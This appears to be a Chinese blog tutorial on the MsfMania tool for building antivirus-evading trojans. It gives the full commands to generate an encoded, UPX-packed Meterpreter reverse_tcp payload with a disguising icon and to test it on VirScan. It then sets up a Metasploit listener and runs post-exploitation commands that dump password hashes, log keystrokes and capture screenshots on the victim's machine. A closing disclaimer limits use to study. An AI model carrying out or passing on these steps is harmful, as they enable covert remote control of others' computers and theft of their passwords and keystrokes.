MsfMania挫败病毒查杀软件

415 阅读2分钟

MsfMania挫败病毒查杀软件

所谓免杀就是MUMA在目标操作系统运行的时候 杀毒软件无法对你的MUMA进行有效的检测、查杀(如有说错 还请各位大佬多多指正.....)

MsfMania工具的简介

这款工具主要是基于Python编写的命令行工具 主要用来绕过杀软的检测 运行环境:Kali+python3

官方贴出来的检测截图

MsfManin1.png

MsfMania安装

这是工具官方给出的截图 不知道效果如何 我们来试一下水 看看效果如何

https://github.com/G1ft3dC0d3/MsfMania				   #该工具的官方文档
git clone https://github.com/G1ft3dC0d3/MsfMania.git   #下载MsfMania到当前目录
cd MsfMania										  #进入MsfMania目录						

MsfMania使用

python3 MsfMania.py -h #显示工具的用法

MsfManin2.png ico图标的制作 1.打开www.ico51.cn/ 选择文件,如1.png,选择ico尺寸后,点击生成即可,生成后的ico图标,放到MsfMania/icon目录下(如果不想在MUMA上显示图标 也可绕过此步)

python3 MsfMania.py -a x64 -p windows/x64/meterpreter/reverse_tcp -cO='-e x64/xor_dynamic' -lh 192.168.1.100 -lp 1616 -o XINGJIU -it local -i 19.ico --upx

MsfManin3.png 生成出来的文件会保存在output目录下

以下是对这条指令参数的解释

-a 选择CPU的架构

-p 使用什么样的payload让主机与我们建立连接

-cO 使用什么样的编码方式来对MUMA进行加密

-lh 设置主机地址

-lp 设置主机端口

-o 生成的文件名称

-it 本地注入

-i 指定ICON图标

--upx 进行upx压缩处理文件大小

此时我们把MUMA丢到VirScanwww.virscan.org/上去检测

MsfManin4.png

不知道实际运行会如何呢?我这里只测了某60 其它杀软没具体测过 不要想着能一直免杀下去 没准上一秒还能用 下一秒就废了

MsfManin5.png

此时我们打开msfconsole进行监听

msfconsole #进入MSF渗透攻击框架

MsfManin6.png

use exploit/multi/handler #使用监听模块
show options #显示监听模块需要设置的参数
set payload windows/x64/meterpreter/reverse_tcp #设置攻击载荷要与刚刚生成的MUMA一致
set LHOST 192.168.1.100 #设置本地主机IP
set LPORT 1616 #设置本地主机端口
run #执行监听

MsfManin7.png

监听后目标主机双击打开MUMA后即可与我们成功建立反向连接的会话 此时就可以执行后渗透相关的指令了

hashdump #抓取电脑密码
keyscan_start #开始键盘记录
keyscan_dump #获取键盘记录内容
sysinfo #查看系统信息

MsfManin8.png

screenshot #对目标主机桌面进行截图

MsfManin9.png

以上就是整个工具的使用方法了 这个工具能用多久也不清楚 没准上一秒能用 下一秒就废了 我个人也折腾了好几天才找到这款工具

免责声明

本工具仅限于学习和技术研究 不可用于任何非法用途